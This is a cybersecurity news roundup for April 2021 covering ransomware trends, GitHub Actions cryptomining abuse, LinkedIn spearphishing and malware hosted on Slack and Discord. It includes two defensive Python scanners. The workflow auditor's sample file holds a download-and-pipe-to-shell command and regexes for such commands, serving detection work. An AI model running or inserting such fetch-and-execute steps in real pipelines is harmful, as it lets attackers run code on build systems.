This week’s Cyber Security Headlines – Week in Review, April 5-9, 2021, is hosted by Steve Prentice (@stevenprentice) with our guest, Justin Berman (@justinmberman), former CISO, Dropbox

Cyber Security Headlines – Week in Review is live every Thursday at 4pm PT/7pm ET. Join us each week by registering for the open discussion.

Ransomware 2.0 is here

The availability of ransomware-as-a-service is allowing more cybercriminals to enter the business, which now includes double extortion, which, according to analysis from F-Secure, increased drastically in 2020. This has led to an increase in ransomware families, including Ragnar Locker, Doppelpaymer, Clop, Conti, and ChaCha. Key findings in the report include: attackers are using Excel formulas, which cannot be blocked, to hide malicious code; Outlook, Facebook and Office 365 were the most popular brands spoofed in phishing emails; three-quarters of domains used to host phishing pages were web hosting services; and email accounted for over half of all malware infection attempts in 2020, making it the most common method of spreading malware in ransomware attacks.

(CISOMag)

Malware attack is preventing car inspections in eight US states

The attack, which occurred last Tuesday, March 30, on emissions testing company Applus Technologies, disconnected its IT systems, preventing vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin. Applus Technologies cannot provide a time frame for restoring service, as state governments require it to go through a rigorous mitigation and testing process. The delay may cascade into DMV inspections, which in turn may lead to citations for lapsed inspections.

(Bleeping Computer)

GitHub investigating crypto mining abuses

GitHub is actively investigating a series of attacks against its cloud infrastructure that allowed cybercriminals to implant and abuse the company’s servers for illicit crypto-mining operations. The attacks, which have been going on since the fall of 2020, abused a feature called GitHub Actions, which allows users to automatically execute tasks and workflows once a certain event happens inside one of their GitHub repositories. The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and then filing a Pull Request against the original repository to merge the code back in; the workflow runs without needing approval from the original project owner.

(The Record)
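The abuse pattern above (a fork adds a workflow that runs on pull-request events and fetches something to execute) is something a repository owner can audit for before it lands. The following is an added example, not code from GitHub or from the reporting: a small stdlib-only scanner that takes the text of a `.github/workflows/*.yml` file, checks whether it is triggered by `pull_request` or `pull_request_target`, and flags `run:` steps whose commands fetch-and-execute remote content. The sample workflow and the regex patterns are constructed for the example; a production audit would use a real YAML parser rather than line matching.

```python
import re

# Constructed sample workflow modelled on the reported abuse: a PR-triggered
# job whose last step pipes a downloaded script straight into a shell.
SAMPLE_WORKFLOW = """\
name: ci
on:
  pull_request:
    branches: [main]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: test
        run: make test
      - name: setup
        run: curl -sL https://example.invalid/setup.sh | bash
"""

# Constructed control case: same step, but only triggered by pushes from
# people who already have write access, so a fork PR cannot fire it.
PUSH_ONLY_WORKFLOW = SAMPLE_WORKFLOW.replace("pull_request:", "push:")

PR_TRIGGERS = ("pull_request", "pull_request_target")

# Command shapes that download and execute in one go (assumed heuristics).
SUSPICIOUS_RUN = {
    "download-pipe-shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"),
    "base64-pipe-shell": re.compile(r"\bbase64\s+(-d|--decode)\b[^|\n]*\|\s*(ba)?sh\b"),
    "chmod-plus-x": re.compile(r"\bchmod\s+\+x\b"),
}


def on_block(text):
    """Return the raw text of the top-level `on:` block (inline or nested form)."""
    out, inside = [], False
    for line in text.splitlines():
        if re.match(r"^on:", line):
            inside = True
            out.append(line)
            continue
        if inside:
            if line and not line[0].isspace():
                break  # next top-level key ends the block
            out.append(line)
    return "\n".join(out)


def pr_triggers(text):
    """Set of pull-request style event names that can start this workflow."""
    block = on_block(text)
    return {t for t in PR_TRIGGERS if re.search(rf"\b{t}\b", block)}


def run_steps(text):
    """Return the shell commands from every `run:` step (single-line or block)."""
    lines = text.splitlines()
    cmds, i = [], 0
    while i < len(lines):
        m = re.match(r"^(\s*)(?:-\s*)?run:\s*(.*)$", lines[i])
        if m:
            indent, value = len(m.group(1)), m.group(2).strip()
            if value in ("|", ">", "|-", ">-"):
                body = []
                i += 1
                while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
                    body.append(lines[i].strip())
                    i += 1
                cmds.append("\n".join(body))
                continue
            cmds.append(value)
        i += 1
    return cmds


def audit_workflow(text):
    """Findings for PR-triggered workflows whose run steps look like fetch-and-execute."""
    triggers = pr_triggers(text)
    if not triggers:
        return []
    findings = []
    for cmd in run_steps(text):
        for name, pattern in SUSPICIOUS_RUN.items():
            if pattern.search(cmd):
                findings.append({"trigger": sorted(triggers), "pattern": name, "command": cmd})
    return findings


if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{f['pattern']:20} {f['trigger']} :: {f['command']}")
```

Because the trigger check and the command check are separate, the same script can also be pointed at `pull_request_target` workflows, which run with the base repository's secrets and so deserve the closest look.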

Firmware malware on the rise

According to Microsoft’s March 2021 Security Signals report, over 80% of enterprises were victims of at least one firmware attack in the past two years. The survey had responses from 1,000 companies from China, Germany, Japan, the U.K. and the U.S., who reported the majority of security investments were going to security updates, vulnerability scanning and advanced threat protection solutions. The report notes that NIST’s National Vulnerability Database has seen a five-fold increase in firmware attacks in the last four years. The report found that only 36% of businesses invest in hardware-based memory encryption and 46% are investing in hardware-based kernel protections, while 21% of decision-makers said they were not able to monitor firmware at all.

(Security Affairs)

Thanks to our episode sponsor, Sotero

This week we’ve been excited to welcome our new sponsor – Sotero. We’ve told you about their encryption solutions that keep data encrypted while the data is in use and in motion. This is the breakthrough that many of us have been waiting for. Well, Sotero has just uploaded to our site a technical whitepaper that takes a deep dive into this new encryption technology. You can find it on our homepage, about halfway down. You can also learn more about this new encryption technology at Soterosoft dot com.

LinkedIn spearphishing campaign uses custom decoy job offers

A new spear-phishing campaign is targeting LinkedIn members with customized job offers in order to deliver a sophisticated backdoor trojan called “more_eggs.” The phish generates malicious ZIP archive files that mimic the victims’ job titles taken from their LinkedIn profiles. If a LinkedIn member’s job is listed as Senior Account Executive—International Freight, the malicious zip file would be titled Senior Account Executive—International Freight position. Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the more_eggs trojan. With the COVID pandemic contributing to job losses, this phish takes advantage of job seekers who are desperate to find employment.

(The Hacker News)

Ransomware attacks increased by 485% in 2020 over 2019

This data comes from Bitdefender’s 2020 Consumer Threat Landscape Report. Among the highlights: two-thirds of the ransomware attacks took place in the first two quarters of 2020. Proprietary operating systems used in IoT devices made up 96% of all detected vulnerabilities, while a 335% surge in Smart TV vulnerabilities occurred compared to 2019. In social engineering, Android was especially heavily targeted, experiencing 32% growth, specifically in impersonations of video conferencing software and COVID-related medical apps. In addition, a 189% year-on-year increase in vulnerabilities in network-attached storage (NAS) devices was observed.

(Infosecurity Magazine)

Industrial Control Systems are becoming a favorite target for threat actors

A new report from Kaspersky confirms that 33.4% of Industrial Control System (ICS) computers worldwide were hit by a cyberattack in the second half of 2020. Citing two of the more famous examples, the China-linked group RedEcho targeting the Indian power sector and an unidentified cybercriminal attempting to poison a Florida city’s water supply and treatment plant, the report states that the attacks have not just evolved but have become a “life-threatening” affair and are on an upswing, with the U.S., Canada, and Saudi Arabia experiencing the largest increases.

(CISOMag)

Microsoft reveals last week’s two-hour Azure outage was caused by DNS DDOS

Following up on a story we brought you on Monday, Microsoft has confirmed its April 1 outage was due to an anomalous surge of DNS queries from all over the world targeting certain domains hosted on Azure. The outage prevented users from accessing or signing into numerous Microsoft services. Microsoft did not reveal who was responsible for the attack, whose success was unusual for such a large and well-defended target as Azure, but stated, “In this incident, one specific sequence of events exposed a code defect in our DNS service that reduced the efficiency of our DNS Edge caches.”

(MSPowerUser.com)

Slack and Discord file sharing used to spread malware

This finding comes from Cisco Talos research, which describes this as an increasingly common attack vector. Threat actors upload malicious files to the platforms, which are then housed on their CDN and linked for access. These links are then shared on other, outside platforms, with the malware served up by Discord or Slack infrastructure. The researchers warned that using legitimate infrastructure generally trusted by other users makes social engineering attacks much easier to pull off. Talos previously identified attackers using Discord to distribute Thanatos ransomware in 2018. Google Forms is also being used for phishing.

(Cyberscoop)
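The defensive angle on the item above is that downloads from a collaboration platform's CDN are trusted by default, yet a link to that CDN arriving from outside the platform is exactly the pattern described. As an added example (not code from Talos or from either vendor), here is a stdlib-only scan over a constructed web-proxy log: it flags downloads of executable or archive file types from the Discord and Slack file-hosting hosts, and rates them higher when the referrer is not the platform itself, i.e. the link was followed from somewhere else. The log format, the host list and the risky-extension list are assumptions for the example.

```python
import os
from urllib.parse import urlparse

# Constructed proxy log: timestamp, client, method, URL, status, bytes, referrer.
SAMPLE_LOG = """\
2021-04-06T10:02:11Z 10.0.0.5 GET https://cdn.discordapp.com/attachments/1111/2222/invoice.exe 200 845212 https://mail.example.invalid/
2021-04-06T10:03:40Z 10.0.0.7 GET https://files.slack.com/files-pri/T000-F000/report.pdf 200 20311 https://app.slack.com/
2021-04-06T10:05:02Z 10.0.0.5 GET https://cdn.discordapp.com/attachments/3333/4444/photo.png 200 5120 https://discord.com/
2021-04-06T10:07:19Z 10.0.0.9 GET https://example.invalid/download/tool.zip 200 99999 -
2021-04-06T10:09:55Z 10.0.0.3 GET https://files.slack.com/files-pri/T000-F001/payroll.zip?dl=1 200 301222 -
"""

# File-hosting hosts for the two platforms (assumed for the example).
CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net", "files.slack.com"}

# Domains whose presence as referrer means the link was clicked inside the platform.
PLATFORM_DOMAINS = ("discord.com", "discordapp.com", "slack.com")

# Extensions treated as risky when delivered from a chat CDN (assumed list).
RISKY_EXTENSIONS = {"exe", "dll", "scr", "msi", "bat", "ps1", "js", "vbs", "hta",
                    "lnk", "jar", "iso", "zip", "rar", "7z"}


def parse_line(line):
    """Split one constructed log line into a dict; returns None on malformed input."""
    parts = line.split()
    if len(parts) != 7:
        return None
    ts, client, method, url, status, size, referrer = parts
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": status, "bytes": int(size), "referrer": referrer}


def is_platform_referrer(referrer):
    """True when the referrer host belongs to Discord or Slack themselves."""
    host = urlparse(referrer).hostname if referrer != "-" else None
    if not host:
        return False
    return any(host == d or host.endswith("." + d) for d in PLATFORM_DOMAINS)


def classify(entry):
    """Return a finding dict for a risky chat-CDN download, else None."""
    parsed = urlparse(entry["url"])
    if parsed.hostname not in CDN_HOSTS:
        return None
    ext = os.path.splitext(parsed.path)[1].lower().lstrip(".")
    if ext not in RISKY_EXTENSIONS:
        return None
    # A CDN link followed from outside the platform matches the reported tactic.
    severity = "medium" if is_platform_referrer(entry["referrer"]) else "high"
    return {"ts": entry["ts"], "client": entry["client"], "host": parsed.hostname,
            "file": os.path.basename(parsed.path), "ext": ext, "severity": severity}


def scan_log(text):
    """Run every line through the parser and classifier; return the findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ts']} {f['client']} {f['host']}/{f['file']}")
```

The severity split matters in practice: a `.zip` fetched from the Slack CDN while the user is in Slack is ordinary collaboration traffic, whereas the same fetch with an e-mail or no referrer is the "link shared on another platform" case the researchers describe and is worth a closer look at the client.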

Lockdowns saw the rise of wine scammers

A new report by Recorded Future notes that the start of COVID-19 lockdowns saw a rise in wine-related domain registrations as people increasingly turned to virtual happy hours to keep in contact with friends and co-workers, up 2-3 times pre-pandemic levels from April 2020 and continuing through March 2021. The report found malicious domains followed a similar growth, delayed by a month, with a large spike in May 2020 and a total of 4,389 malicious wine-themed domains identified. Malicious wine-related domains as a percentage of all wine domains registered peaked in June 2020 at 7%.

(Recorded Future)